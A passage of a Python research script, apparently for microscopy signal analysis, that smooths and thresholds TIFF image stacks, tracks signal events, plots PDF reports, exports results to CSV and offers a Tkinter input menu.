t9 = time.time()\r\n #print(t9-t8)\r\n p_region = np.asarray(p_region, dtype=object)\r\n t10 = time.time()\r\n #print(t10-t9)\r\n first_frame = p_cent[0,0]\r\n t11 = time.time()\r\n #print(t11-t10)\r\n area_freq = np.unique(p_cent[:,0],return_counts = True)\r\n t12 = time.time()\r\n #print(t12-t11)\r\n divergence = False\r\n convergence = False\r\n if(np.max(area_freq[1])>1):\r\n if(np.diff(area_freq[1]).any()>0):\r\n divergence = True \r\n if(np.diff(area_freq[1]).any()<0):\r\n convergence = True \r\n split_status = np.array([divergence,convergence])\r\n wave = False\r\n #print(np.diff(p_cent[:,1]))\r\n if((np.max(p_cent[:,1])-np.min(p_cent[:,1]) or np.max(p_cent[:,2])-np.min(p_cent[:,2]))>5):\r\n wave = True\r\n #print(len(regionprops(particle_mask)))\r\n #imsave(filename + str(i) +\"_particle_test\", np.asarray(particle_mask,dtype=np.uint8)) \r\n #for site in range(0,len(sum_coords)):\r\n #index_match = (point[i] == sum_coords[site]).all(axis = 1).any() \r\n #print(\"index match: \", index_match) \r\n events[tal +i] = np.array([p_area,np.max(p_area),p_cent,len(regionprops(particle_mask)),p_amp,np.max(p_amp)-np.min(p_amp),first_frame,p_region[0],\r\n p_coords,split_status,area_freq,np.diff(area_freq[1]),wave,np.tile(boxes[k],(len(regionprops(particle_mask)),1)),np.tile(boxes[k],(len(p_coords),1)),\r\n np.tile(boxes[k],(len(p_region[0]),1))],dtype=object) \r\n\t\t\r\n t13 = time.time()\r\n #events.clear()\r\n #print(t13-t12)\r\n #pkl.dump( events, open( raw_path + \"/\" +filename + \"_raw.p\", \"wb\" ) )\r\n return events, len(point)\r\n\r\n\r\n\r\ndef graphics(sites,binary_gauss,sum_particle,sum_mask,mask):\r\n events = np.array(list(sites.values()),dtype=object)\r\n areas = np.concatenate(events[:,0]).ravel()\r\n amps = np.concatenate(events[:,4]).ravel()\r\n amps = amps.astype(int)\r\n \r\n cents = np.concatenate(events[:,2]).ravel()\r\n cents = 
cents.reshape(((len(cents)//3),3))\r\n \r\n boxes = np.concatenate(events[:,13]).ravel()\r\n boxes = boxes.reshape(((len(boxes)//4),4))\r\n \r\n box_offset = np.concatenate(events[:,14]).ravel()\r\n box_offset = box_offset.reshape(((len(box_offset)//4),4)) \r\n \r\n cents[:,1] = cents[:,1] + boxes[:,0]\r\n cents[:,2] = cents[:,2] + boxes[:,1]\r\n \r\n cors = np.array(events[:,8])\r\n coords = np.concatenate(cors).ravel()\r\n coords = coords.reshape(((len(coords)//3),3))\r\n \r\n coords[:,1] = coords[:,1] + box_offset[:,0]\r\n coords[:,2] = coords[:,2] + box_offset[:,1]\r\n \r\n # print(\"coords: \", coords)\r\n #print(\"len: \", len(coords))\r\n #print(\"cents: \", cents)\r\n #print(\"len: \", len(box_offset))\r\n\r\n starts = np.concatenate(events[:,7]).ravel()\r\n starts = starts.reshape(((len(starts)//3),3))\r\n #print(starts)\r\n start_offset = np.concatenate(events[:,15]).ravel()\r\n start_offset = start_offset.reshape(((len(start_offset)//4),4)) \r\n \r\n starts[:,1] = starts[:,1] + start_offset[:,0]\r\n starts[:,2] = starts[:,2] + start_offset[:,1]\r\n\r\n # create color maps so each event gets a distinct color\r\n event_colors = cm.tab20b(np.linspace(.15, 0.6, len(events)))\r\n area_colors = []\r\n coords_colors = []\r\n coorz_colors = []\r\n starts_colors = []\r\n for i in range(len(events)):\r\n for x in events[i][0]:\r\n area_colors.append(event_colors[i])\r\n for x in events[i][8]:\r\n coords_colors.append(event_colors[i])\r\n for x in events[i][8]:\r\n coorz_colors.append(event_colors[i,0])\r\n for x in events[i][7]:\r\n starts_colors.append(event_colors[i])\r\n\r\n \r\n #print(amps)\r\n \r\n #print(areas)\r\n mpl.style.use('tableau-colorblind10') \r\n with PdfPages(raw_path + \"/\" + filename +\"_signal_report.pdf\") as pdf: \r\n mask_page1 = plt.figure(figsize=(16, 9), dpi=300)\r\n plt.rcParams.update({'font.size': 12})\r\n plt.subplot(1,3,1)\r\n plt.scatter(np.random.uniform(0.95,1.05,size=len(events[:,1])),events[:,1],edgecolors='black', c = event_colors) \r\n plt.xlim(0.9,1.1)\r\n plt.xticks([])\r\n plt.ylabel('maximal area (um^2)')\r\n plt.subplot(1,3,2)\r\n plt.title(\"Signal Descriptors\")\r\n plt.scatter(np.random.uniform(0.95,1.05,size=len(events[:,3])),events[:,3],edgecolors='black', c = event_colors)\r\n plt.xlim(0.9,1.1)\r\n plt.xticks([])\r\n plt.ylabel('duration (s)')\r\n plt.subplot(1,3,3)\r\n plt.scatter(np.random.uniform(0.95,1.05,size=len(events[:,5])),events[:,5],edgecolors='black', c = event_colors)\r\n plt.xlim(0.9,1.1)\r\n plt.xticks([])\r\n plt.ylabel('maximal intensity (delta f)')\r\n #txt=\"Figure 1. Event parameter strip charts. Maximal area (u^2), total duration (s), and maximal intensity (f) are plotted as points.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n mask_page2 = plt.figure(figsize=(11, 8.5), dpi=300) \r\n im2 = plt.imshow(sum_mask,cmap='magma', interpolation='gaussian')\r\n plt.colorbar(im2)\r\n plt.title(\"Signal Time Lapse\")\r\n #txt=\"Figure 2. Event masks. The filtered and summed image is shown overlayed with its particle mask.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig() \r\n #cb.remove()\r\n mask_page3 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.rcParams.update({'font.size': 12})\r\n plt.subplot(1,1,1)\r\n im1 = plt.imshow(sum_particle, cmap = 'inferno')\r\n cb = plt.colorbar(im1)\r\n plt.title(\"Signal Locations\")\r\n #txt=\"Figure 3. 
The particle mask.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n mask_page4 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.subplot(2,1,1)\r\n plt.scatter(cents[:,0],areas,edgecolors='black',linewidths=0.2, c = area_colors) \r\n #[plt.scatter(events[key][2][:,0],events[key][0],edgecolors='black',linewidths=0.2) for key in events]\r\n plt.title(\"Signal Time Course \")\r\n plt.ylabel('area (um^2)')\r\n plt.xlabel('time (s)')\r\n #plt.ylim(0,np.max(events[:,1])+10)\r\n plt.xlim(0,len(binary_gauss))\r\n plt.subplot(2,1,2)\r\n plt.scatter(cents[:,0],amps,edgecolors='black',linewidths=0.2, c = area_colors) \r\n plt.ylabel('intensity (f)')\r\n plt.xlabel('time (s)')\r\n #plt.ylim(0,300)\r\n plt.xlim(0,len(binary_gauss))\r\n #txt=\"Figure 4. Area and Intensity versus time plots. The time course of event area and intensity are plotted as colored lines.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n mask_page5 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.rcParams.update({'font.size': 12})\r\n ax_1 = mask_page5.add_subplot(111, projection='3d',rasterized=True)\r\n ax_1.scatter3D(cents[:,2],cents[:,0],cents[:,1],c = area_colors) #here is the modified line\r\n ax_1.set_xlabel('x')\r\n ax_1.set_ylabel('time (s)')\r\n ax_1.set_zlabel('y')\r\n ax_1.set_title(\"Signal Centers Over Time\")\r\n ax_1.set_zlim(0,len(binary_gauss[0,1]))\r\n ax_1.set_xlim(0,len(binary_gauss[0,0]))\r\n #ax_1.set_facecolor('w')\r\n plt.gca().invert_zaxis()\r\n #ax_1.grid(b=None)\r\n #txt=\"Figure 5. 3D plot of events centroids over time. The center of each event over time is plotted as 3D lines.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n mask_page6 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.rcParams.update({'font.size': 12})\r\n ax_2 = mask_page6.add_subplot(111, projection='3d', rasterized=True)\r\n #ax_2.plot3D(coords[:,2],coords[:,0],coords[:,1],linewidth = 0.1) #here si the modified line\r\n ax_2.scatter3D(coords[:,2],coords[:,0],coords[:,1], c = coords_colors) #here is the modified line\r\n ax_2.set_xlabel('x')\r\n ax_2.set_ylabel('time (s)')\r\n ax_2.set_zlabel('y')\r\n ax_2.set_title(\"Signals Over Time\")\r\n ax_2.set_zlim(0,len(binary_gauss[0,1]))\r\n ax_2.set_xlim(0,len(binary_gauss[0,0]))\r\n #ax_1.set_facecolor('w')\r\n plt.gca().invert_zaxis()\r\n #ax_1.grid(b=None)\r\n #txt=\"Figure 5. 3D plot of events centroids over time. The center of each event over time is plotted as 3D lines.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n mask_page7 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.rcParams.update({'font.size': 12})\r\n plt.subplot(1,1,1)\r\n plt.scatter(starts[:,2],starts[:,1],edgecolors='black',c = starts_colors) \r\n plt.ylim(0,len(binary_gauss[0,1]))\r\n plt.xlim(0,len(binary_gauss[0,0]))\r\n plt.gca().invert_yaxis()\r\n plt.title(\"Signal Origination Sites\")\r\n #txt=\"Figure 6. Event origination sites. 
The coordinates of the first frame of each event is shown as a colored scatter plot.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n #mask_page8 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n #[plt.scatter(events[key][8][:,2],events[key][8][:,1]) for key in events]\r\n #plt.ylim(0,len(binary_gauss[0,1]))\r\n #plt.xlim(0,len(binary_gauss[0,0]))\r\n #plt.gca().invert_yaxis()\r\n #txt=\"\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n #pdf.savefig()\r\n #------------------------------------------\r\n # untouched half) \r\n #mask_page9 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n #for key in events:\r\n # spectrum = np.real(np.fft.fft(events[key][4]))\r\n # frequencies = np.real(np.fft.fftfreq(len(spectrum)))\r\n # plt.plot(abs(frequencies),spectrum)\r\n # plt.ylim(0,1000)\r\n # plt.xlim(0,0.5)\r\n #plt.ylabel('Intensity')\r\n #plt.xlabel('Frequency')\r\n #plt.title(\"Signal Intensity Fourier Frequencies\")\r\n #pdf.savefig() \r\n #for key in events:\r\n # if(events[key][9].any()== True):\r\n # mask_page10 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n # plt.rcParams.update({'font.size': 12})\r\n # ax_3 = mask_page10.add_subplot(111, projection='3d') \r\n # ax_3.plot3D(events[key][8][:,2], events[key][8][:,0],events[key][8][:,1])\r\n # ax_3.set_xlabel('x')\r\n # ax_3.set_ylabel('time (s)')\r\n # ax_3.set_zlabel('y')\r\n # ax_3.set_title(\"Divergent/Convergent Signals\")\r\n # ax_3.set_zlim(0,len(binary_gauss[0,1]))\r\n # ax_3.set_xlim(0,len(binary_gauss[0,0]))\r\n # plt.gca().invert_zaxis()\r\n # pdf.savefig() \r\n # for key in events:\r\n # if(events[key][12] == True):\r\n # mask_page11 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n # plt.rcParams.update({'font.size': 12})\r\n # ax_4 = mask_page11.add_subplot(111, projection='3d') \r\n # ax_4.plot3D(events[key][8][:,2], events[key][8][:,0],events[key][8][:,1])\r\n # ax_4.set_xlabel('x')\r\n # ax_4.set_ylabel('time (s)')\r\n # ax_4.set_zlabel('y')\r\n # ax_4.set_title(\"Propagating Waves\")\r\n # ax_4.set_zlim(0,len(binary_gauss[0,1]))\r\n # ax_4.set_xlim(0,len(binary_gauss[0,0]))\r\n # plt.gca().invert_zaxis()\r\n #pdf.savefig() \r\n #mask_page13 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n #plt.rcParams.update({'font.size': 12})\r\n #ax_5 = mask_page13.add_subplot(111, projection='3d') \r\n #ax_5.scatter3D(events[:,1], events[:,3],events[:,5],c = range(len(events[:,1])),s=80) \r\n #ax_5.set_xlabel('maximal area (um^2)')\r\n #ax_5.set_ylabel('duration (s)')\r\n #ax_5.set_zlabel('maximal intensity (f)')\r\n #ax_5.set_zlim(0,len(binary_gauss[0,1]))\r\n #ax_5.set_title(\"signal scatter\") \r\n #pdf.savefig() \r\n plt.close('all')\r\n return\r\ndef graphics_inter(sites, binary_gauss, sum_particle, sum_mask, mask):\r\n events = np.array(list(sites.values()),dtype=object)\r\n areas = np.concatenate(events[:,0]).ravel()\r\n amps = np.concatenate(events[:,4]).ravel()\r\n amps = amps.astype(int)\r\n \r\n cents = np.concatenate(events[:,2]).ravel()\r\n cents = cents.reshape(((len(cents)//3),3))\r\n \r\n boxes = np.concatenate(events[:,13]).ravel()\r\n boxes = boxes.reshape(((len(boxes)//4),4))\r\n \r\n box_offset = np.concatenate(events[:,14]).ravel()\r\n box_offset = box_offset.reshape(((len(box_offset)//4),4)) \r\n \r\n cents[:,1] = cents[:,1] + boxes[:,0]\r\n cents[:,2] = cents[:,2] + boxes[:,1]\r\n \r\n cors = np.array(events[:,8])\r\n coords = np.concatenate(cors).ravel()\r\n coords = coords.reshape(((len(coords)//3),3))\r\n \r\n coords[:,1] = 
coords[:,1] + box_offset[:,0]\r\n coords[:,2] = coords[:,2] + box_offset[:,1]\r\n \r\n # print(\"coords: \", coords)\r\n #print(\"len: \", len(coords))\r\n #print(\"cents: \", cents)\r\n #print(\"len: \", len(box_offset))\r\n\r\n starts = np.concatenate(events[:,7]).ravel()\r\n starts = starts.reshape(((len(starts)//3),3))\r\n #print(starts)\r\n start_offset = np.concatenate(events[:,15]).ravel()\r\n start_offset = start_offset.reshape(((len(start_offset)//4),4)) \r\n \r\n starts[:,1] = starts[:,1] + start_offset[:,0]\r\n starts[:,2] = starts[:,2] + start_offset[:,1]\r\n\r\n # create color maps so each event gets a distinct color\r\n event_colors = cm.tab20c(np.linspace(0, 1, len(events)))\r\n area_colors = []\r\n coords_colors = []\r\n coorz_colors = []\r\n starts_colors = []\r\n for i in range(len(events)):\r\n for x in events[i][0]:\r\n area_colors.append(event_colors[i])\r\n for x in events[i][8]:\r\n coords_colors.append(event_colors[i])\r\n for x in events[i][8]:\r\n coorz_colors.append(event_colors[i,0])\r\n for x in events[i][7]:\r\n starts_colors.append(event_colors[i])\r\n \r\n # normalize area_colors based on intensity\r\n max_amp = max(amps) \r\n min_amp = min(amps) - 5000\r\n norm_amps = (amps - min_amp) / (max_amp - min_amp)\r\n temp = np.array(area_colors).T\r\n temp = [temp[0],temp[1],temp[2],norm_amps]\r\n area_colors_norm = np.array(temp).T\r\n \r\n # normalize area_colors based on intensity\r\n max_dur = max(amps) \r\n min_dur = min(amps) - 5000\r\n norm_durs = (amps - min_dur) / (max_dur - min_dur)\r\n temp = np.array(area_colors).T\r\n temp = [temp[0],temp[1],temp[2],norm_durs]\r\n duration_colors_norm = np.array(temp).T\r\n\r\n \r\n #print(amps)\r\n #print(areas)\r\n mpl.style.use('tableau-colorblind10') \r\n pdf_file = temp_full_filename.replace('.tif','_report.pdf')\r\n with PdfPages(pdf_file) as pdf: \r\n #mask_page1 = plt.figure(figsize=(16, 9), dpi=300)\r\n #plt.rcParams.update({'font.size': 12})\r\n #plt.subplot(1,3,1)\r\n #plt.scatter(np.random.uniform(0.95,1.05,size=len(events[:,1])),events[:,1],edgecolors='black', c = event_colors) \r\n #plt.xlim(0.9,1.1)\r\n #plt.xticks([])\r\n #plt.ylabel('maximal area (pixel^2)')\r\n #plt.subplot(1,3,2)\r\n #plt.title(\"Signal Descriptors\")\r\n #plt.scatter(np.random.uniform(0.95,1.05,size=len(events[:,3])),events[:,3],edgecolors='black', c = event_colors)\r\n #plt.xlim(0.9,1.1)\r\n #plt.xticks([])\r\n #plt.ylabel('duration (frames)')\r\n #plt.subplot(1,3,3)\r\n #plt.scatter(np.random.uniform(0.95,1.05,size=len(events[:,5])),events[:,5],edgecolors='black', c = event_colors)\r\n #plt.xlim(0.9,1.1)\r\n #plt.xticks([])\r\n #plt.ylabel('maximal intensity (delta f)')\r\n #txt=\"Figure 1. Event parameter strip charts. Maximal area (u^2), total duration (s), and maximal intensity (f) are plotted as points.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n #pdf.savefig()\r\n mask_page2 = plt.figure(figsize=(11, 8.5), dpi=300) \r\n im2 = plt.imshow(sum_mask,cmap='magma', interpolation='gaussian')\r\n #plt.colorbar(im2)\r\n #plt.title(\"Signal Time Lapse\")\r\n #txt=\"Figure 2. Event masks. 
The filtered and summed image is shown overlayed with its particle mask.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig() \r\n #cb.remove()\r\n mask_page3 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.rcParams.update({'font.size': 12})\r\n plt.subplot(1,1,1)\r\n im1 = plt.imshow(sum_particle, cmap = 'inferno')\r\n cb = plt.colorbar(im1)\r\n plt.title(\"Signal Locations\")\r\n #txt=\"Figure 3. The particle mask.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n mask_page4 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.subplot(2,1,1)\r\n plt.scatter(cents[:,0],areas,edgecolors='black',linewidths=0.2, c = area_colors) \r\n #[plt.scatter(events[key][2][:,0],events[key][0],edgecolors='black',linewidths=0.2) for key in events]\r\n plt.title(\"Signal Time Course \")\r\n plt.ylabel('area (pixel^2)')\r\n plt.xlabel('time (frames)')\r\n #plt.ylim(0,np.max(events[:,1])+10)\r\n plt.xlim(0,len(binary_gauss))\r\n plt.subplot(2,1,2)\r\n plt.scatter(cents[:,0],amps,edgecolors='black',linewidths=0.2, c = area_colors) \r\n plt.ylabel('intensity (f)')\r\n plt.xlabel('time (frames)')\r\n #plt.ylim(0,300)\r\n plt.xlim(0,len(binary_gauss))\r\n #txt=\"Figure 4. Area and Intensity versus time plots. The time course of event area and intensity are plotted as colored lines.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n #mask_page5 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n #plt.rcParams.update({'font.size': 12})\r\n #ax_1 = mask_page5.add_subplot(111, projection='3d',rasterized=True)\r\n #ax_1.scatter3D(cents[:,2],cents[:,0],cents[:,1],c = area_colors) #here is the modified line\r\n #ax_1.set_xlabel('x')\r\n #ax_1.set_ylabel('time (frames)')\r\n #ax_1.set_zlabel('y')\r\n #ax_1.set_title(\"Signal Centers Over Time\")\r\n #ax_1.set_zlim(0,len(binary_gauss[0,1]))\r\n #ax_1.set_xlim(0,len(binary_gauss[0,0]))\r\n #ax_1.set_facecolor('w')\r\n #plt.gca().invert_zaxis()\r\n #ax_1.grid(b=None)\r\n #txt=\"Figure 5. 3D plot of events centroids over time. 
The center of each event over time is plotted as 3D lines.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n #pdf.savefig()\r\n \r\n plt.close('all')\r\n\r\n return\r\n\r\ndef pkl_to_csv(file_name, save_files):\r\n \r\n output_data_csv = file_name.replace('_raw.p','_data.csv')\r\n output_coords_csv = file_name.replace('_raw.p','_coords.csv')\r\n rois = pkl.load( open (file_name, \"rb\") ) \r\n rois = np.array(list(rois.values()),dtype=object)\r\n\r\n column_titles_data = ['ROI_ID','t_centroids [frame]','x_centroid [pixel]','y_centroid [pixel]','Area [pixel^2]','Amplitude',\r\n 'Starting Frame','Duration [frames]','Max Total Area','Max Amplitude','Converge/Diverge']\r\n column_titles_coords = ['ROI_ID', 't [frame]', 'x [pixel]', 'y [pixel]']\r\n\r\n all_rows = []\r\n all_coords = []\r\n \r\n all_rows.append(column_titles_data)\r\n all_coords.append(column_titles_coords)\r\n \r\n for i in range(len(rois)):\r\n \r\n for j in range(len(rois[i][2])):\r\n \r\n idx = str(i)\r\n t = str(int(rois[i][2][j][0]))\r\n box_offset = rois[i][13][j]\r\n y_c = str(int(rois[i][2][j][1]) + int(box_offset[0]))\r\n x_c = str(int(rois[i][2][j][2]) + int(box_offset[1]))\r\n area = str(rois[i][0][j])\r\n amp = str(int(rois[i][4][j]))\r\n if j == 0:\r\n sf = str(rois[i][6])\r\n duration = str(int(rois[i][3]))\r\n con_div = '0'\r\n if rois[i][9][0] != False or rois[i][9][1] != False:\r\n con_div = '1'\r\n max_amp = str(int(max([rois[i][4][x] for x in range(len(rois[i][2]))])))\r\n max_area = 0\r\n uniq_t = set([rois[i][2][x][0] for x in range(len(rois[i][2]))])\r\n for y in uniq_t:\r\n areas = [rois[i][0][x] for x in range(len(rois[i][0])) if rois[i][2][x][0] == y]\r\n sum_areas = np.sum(areas)\r\n if sum_areas > max_area:\r\n max_area = sum_areas\r\n max_area = str(max_area)\r\n\r\n csv_row = [idx, t, x_c, y_c, area, amp, sf, duration, max_area, max_amp, con_div]\r\n else:\r\n csv_row = [idx, t, x_c, y_c, area, amp]\r\n all_rows.append(csv_row)\r\n \r\n if save_files[1] == True:\r\n x_offset = rois[i][14][:,1]\r\n y_offset = rois[i][14][:,0]\r\n roi_ts = rois[i][8][:,0]\r\n roi_xs = rois[i][8][:,2] + x_offset\r\n roi_ys = rois[i][8][:,1] + y_offset\r\n roi_coords = [[str(i),roi_ts[j],roi_xs[j],roi_ys[j]] for j in range(len(roi_ts))]\r\n all_coords.extend(roi_coords)\r\n if save_files[0] == True:\r\n with open(output_data_csv, 'w', newline='') as csv_file:\r\n csvwriter = csv.writer(csv_file,delimiter=',')\r\n csvwriter.writerows(all_rows)\r\n \r\n if save_files[1] == True:\r\n with open(output_coords_csv, 'w', newline='') as csv_file:\r\n csvwriter = csv.writer(csv_file,delimiter=',')\r\n csvwriter.writerows(all_coords)\r\n \r\ndef get_s8_inputs():\r\n root = tk.Tk()\r\n root.title('S8 Menu ')\r\n \r\n def help_menu():\r\n os.system('gedit Info/help.txt')\r\n\r\n\r\n menubar = tk.Menu(root)\r\n f = tk.Menu(menubar, tearoff=1)\r\n #f.add_command(label='Help',command=help_menu)\r\n f.add_command(label='Quit',command=sys.exit)\r\n menubar.add_cascade(label='File',menu=f)\r\n root.config(menu=menubar)\r\n\r\n #root.geometry('400x200')\r\n print('\\n') \r\n def get_input_directory():\r\n global input_path\r\n input_path = filedialog.askdirectory(title='Select INPUT directory')\r\n print('Input directory set as: {0}'.format(input_path))\r\n return input_path\r\n def get_output_directory():\r\n global output_path\r\n output_path = filedialog.askdirectory(title='Select OUTPUT directory')\r\n print('Output directory set as: {0}'.format(output_path))\r\n\r\n\r\n tk.Label(root, 
text='(1) INPUT directory').grid(row=0, sticky=tk.W)\r\n tk.Button(root, text='Click here', \r\n command=get_input_directory).grid(row=1, sticky=tk.N, pady=6)\r\n tk.Label(root, text='(2) OUTPUT directory').grid(row=2, sticky=tk.W)\r\n tk.Button(root, text='Click here', \r\n command=get_output_directory).grid(row=3, sticky=tk.N, pady=6)\r\n\r\n tk.Label(root, text=\"(3) Use spatial smoothing:\").grid(row=4, sticky=tk.W)\r\n var_otsu = tk.BooleanVar(value=True)\r\n tk.Radiobutton(root, text='Yes', variable=var_otsu, value=True).grid(row=5,column=0,sticky=tk.W)\r\n tk.Radiobutton(root, text='No', variable=var_otsu, value=False).grid(row=5,column=1,sticky=tk.W)\r\n \r\n tk.Label(root, text=\"(4) Use temporal smoothing:\").grid(row=9, sticky=tk.W)\r\n var_savgol = tk.BooleanVar(value=True)\r\n tk.Radiobutton(root, text='Yes', variable=var_savgol, value=True).grid(row=10,column=0, sticky=tk.W)\r\n tk.Radiobutton(root, text='No', variable=var_savgol, value=False).grid(row=10,column=1,sticky=tk.W)\r\n\r\n tk.Label(root, text=\"(5) Use noise gate:\").grid(row=12, sticky=tk.W)\r\n var_gate = tk.BooleanVar(value=True)\r\n tk.Radiobutton(root, text='Yes', variable=var_gate, value=True).grid(row=13, column=0, sticky=tk.W)\r\n tk.Radiobutton(root, text='No', variable=var_gate, value=False).grid(row=13, column=1, sticky=tk.W)\r\n\r\n tk.Label(root, text=\"(6) Adaptive Threshold Method:\").grid(row=14,sticky=tk.W)\r\n options_list = [\"Otsu\",\"Triangle\",\"Yen\"]\r\n value_inside = tk.StringVar(root)\r\n value_inside.set(\"Otsu\")\r\n tk.OptionMenu(root,value_inside,*options_list).grid(row=15,column=0,sticky=tk.W)\r\n\r\n\r\n\r\n tk.Label(root, text=\"(7) Select csv files to save\").grid(row=16, sticky=tk.W)\r\n var1 = tk.BooleanVar(value=True)\r\n tk.Checkbutton(root, text='ROI Data file', variable=var1).grid(row=17,column=0, sticky=tk.W)\r\n var2 = tk.BooleanVar(value=False)\r\n tk.Checkbutton(root, text=\"Coordinate file\", variable=var2).grid(row=18,column=0, sticky=tk.W)\r\n\r\n #tk.Label(root, text=\"(8) Click submit\").grid(row=15, sticky=tk.W)\r\n tk.Button(root, text='Submit', command=root.destroy).grid(row=19, sticky=tk.N, pady=6)\r\n tk.mainloop()\r\n try:\r\n return input_path, output_path, var_otsu.get(), var_savgol.get(), var_gate.get(), value_inside.get(), var1.get(), var2.get()\r\n except:\r\n print('\\n')\r\n print('NO DIRECTORY SELECTED, TRY AGAIN')\r\n print('\\n')\r\n print('Terminal will close in:')\r\n for i in range(5,0,-1):\r\n print(i)\r\n time.sleep(1)\r\n print('Goodbye')\r\n sys.exit()\r\n \r\nprint('Welcome to the S8 signal processing code!')\r\nfolder_path, output_path, var_otsu, var_savgol, var_gate, value_inside, save_csv1, save_csv2 = get_s8_inputs()\r\nraw_path = output_path\r\nsave_csvs = [save_csv1, save_csv2]\r\nprint(save_csvs)\r\n\r\n#print(\"folder path:\", folder_path)\r\n#print(\"raw path:\", output_path)\r\nfor filename in os.listdir(folder_path):\r\n\r\n # Only select tif files in folder_path directory\r\n if filename.endswith('.tif') and os.path.isfile('{0}/{1}'.format(folder_path,filename)):\r\n print(\"\\n\" + filename)\r\n temp_full_filename = output_path + '/' + filename\r\n p_file = temp_full_filename.replace('.tif', '_raw.p')\r\n if os.path.isfile(p_file):\r\n continue\r\n\r\n images = TiffStack(folder_path +\"/\" +filename)\r\n yval = np.array(images)\r\n data_type = type(yval[0][0][0])\r\n print(\"val_inside:\", value_inside)\r\n #print(\"image ram:\", psutil.virtual_memory()[3]/1000000000-start_ram)\r\n 
#--------------------------------------------------------------\r\n #Noise Filtering Module\r\n #----------------------------------------------------------------\r\n #yval = np.apply_along_axis(savitzky_golay,0,yval)\r\n \r\n if var_savgol:\r\n #win_size = 2 * int(len(yval) / 5) + 1\r\n win_size = 49\r\n yval = savgol_filter(yval,win_size,3,axis=0, mode ='mirror')\r\n yval = yval-np.amin(yval, axis = 0)\r\n #yval[yval < 0] = 0\r\n yval = np.array(yval, dtype=data_type) \r\n \r\n imsave(raw_path + '/' + filename + '_filtered_new.tif', yval) #save the filtered image\r\n #print(\"filtered ram:\",psutil.virtual_memory()[3]/1000000000-start_ram)\r\n #-------------------------------------------------------------------------------\r\n #Binarize\r\n #--------------------------------------------------------------------------------\r\n binary_gauss = adaptive_thresholding(yval,var_otsu, var_gate, value_inside)\r\n\r\n #print(\"binary ram:\",psutil.virtual_memory()[3]/1000000000-start_ram)\r\n #-------------------------------------------------------------------------------\r\n #Masking\r\n #----------------------------------------------------------------------------------\r\n mask = masker(binary_gauss, yval)\r\n \r\n #print(\"mask ram:\",psutil.virtual_memory()[3]/1000000000-start_ram)\r\n #----------------------------------------------------------------------------------\r\n # Summing\r\n #-------------------------------------------------------------------------------------\r\n sum_particle = particle_sum(binary_gauss)\r\n sum_mask = masker_sum(mask)\r\n #---------------------------------------------------------------------------------------------\r\n # Splitting\r\n #----------------------------------------------------------------------------------\r\n cropped_values = multicrop(sum_particle,binary_gauss,mask)\r\n \r\n #----------------------------------------------------------------------------------------\r\n #Event Tracking\r\n #-----------------------------------------------------------------------------------------------\r\n sites = {}\r\n tal = 0\r\n for k,v in cropped_values[0].items():\r\n trk = three_tracker(tal, k, v,cropped_values[1], raw_path)\r\n sites.update(trk[0])\r\n tal += trk[1]\r\n \r\n #print(\"events ram:\",psutil.virtual_memory()[3]/1000000000-start_ram) \r\n #print(\"time series analysis time:\", time.time() -t_start)\r\n #--------------------------------------------------\r\n #Write Dictionary\r\n #------------------------------------------------------------------------\r\n \r\n with open(p_file, \"wb\") as handle:\r\n pkl.dump(sites, handle, protocol=pkl.HIGHEST_PROTOCOL)\r\n #------------------------------------------------------------------------\r\n #Read Dictionary and make plots\r\n #-------------------------------------------------------------------\r\n #myDicts = pkl.load( open (raw_path + \"/\" +filename +\"_raw.p\", \"rb\") ) \r\n myDicts = pkl.load( open (p_file, 'rb'))\r\n if len(myDicts) != 0:\r\n \r\n graphics(myDicts, binary_gauss, sum_particle, sum_mask, mask)\r\n \r\n #if save_csvs[0] == True or save_csvs[1] == True:\r\n # pkl_to_csv(p_file, save_csvs)\r\n \r\n else:\r\n print('No sites found')\r\n \r\n print(\"graphics time:\",time.time() - t_start) \r\n \r\nif save_csvs[0] == True or save_csvs[1] == True:\r\n for f in os.listdir(output_path):\r\n full_f = output_path + '/' + f\r\n if full_f.endswith('.p'): \r\n pkl_to_csv(full_f, save_csvs)\r\n \r\nprint('\\n')\r\ninput('S8 has finished! 
